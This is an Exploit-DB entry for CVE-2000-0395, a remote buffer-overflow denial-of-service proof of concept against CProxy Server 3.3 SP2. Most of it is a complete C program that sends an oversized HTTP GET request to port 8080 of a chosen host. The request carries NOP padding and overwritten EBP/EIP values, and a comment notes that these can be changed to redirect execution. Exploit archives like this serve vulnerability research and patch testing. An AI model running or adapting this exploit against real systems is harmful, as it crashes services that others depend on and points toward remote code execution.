Computalynx CProxy Server 3.3 SP2 - Buffer Overflow (Denial of Service) (PoC)

EDB-ID:

19920

CVE:

2000-0395

EDB Verified:

Author:

HaCk-13 TeaM

Type:

dos

Exploit:   /  

Platform:

Multiple

Date:

2000-05-16

Vulnerable App: 
// source: https://www.securityfocus.com/bid/1213/info

A buffer overflow DoS vulnerability exists in CProxy Server 3.3 Service Pack 2


/*
 * Remote Denial of Service for CProxy v3.3 - Service Pack 2
 * 
 * (C) |[TDP]|  - HaCk-13 TeaM -  2000      <tdp@psynet.net>
 *
 *
 * This program xploits an overflow vulnerability in CProxy 3.3 SP2
 * HTTP Service (8080), causing server shutdown
 *
 * Greetings to all the other members and all my friends :) 
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BUFFERSIZE 247
#define NOP 0x90
// If you change this values you can change EIP and EBP values
// to redirect to a code that you want >;)
#define EIP 0x61616161
#define EBP 0x61616161

void usage(char *progname) {
 fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);
 exit(1);
}

int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE], remotedos[1024];
unsigned long *long_ptr,eip=EIP, ebp=EBP;
int aux,sock;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;

 fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");

 if (argc<2) usage(argv[0]);

 if (argc>=3) eip+=atol(argv[2]);

 if (argc>=4) ebp+=atol(argv[3]);

 ptr=buffer;
 memset(ptr,0,sizeof(buffer));
 memset(ptr,NOP,sizeof(buffer)-8);
 ptr+=sizeof(buffer)-8;
 long_ptr=(unsigned long*)ptr;
 *(long_ptr++) = ebp;
 *(long_ptr++) = eip;
 ptr=(char *)long_ptr;
 *ptr='\0';

 bzero(remotedos, sizeof(remotedos));
 snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);

 if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
 perror("socket()");
 return -1;
 }

 if ((he = gethostbyname(argv[1])) != NULL) {
 ip = *(unsigned long *)he->h_addr;
 } else {
 if ((ip = inet_addr(argv[1])) == NULL) {
  perror("inet_addr()");
  return -1;
 }
 }

 sin.sin_family = AF_INET;
 sin.sin_addr.s_addr = ip;
 sin.sin_port = htons(8080);

 fprintf(stderr,"\nEngaged...\n");
 if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
 perror("connect()");
 return -1;
 }

 if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) {
 perror("write()");
 return -1;
 }

 fprintf(stderr,"Bye Bye baby!...\n\n");
 if (close(sock) < 0) {
 perror("close()");
 return -1;
 }

 return(0);
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services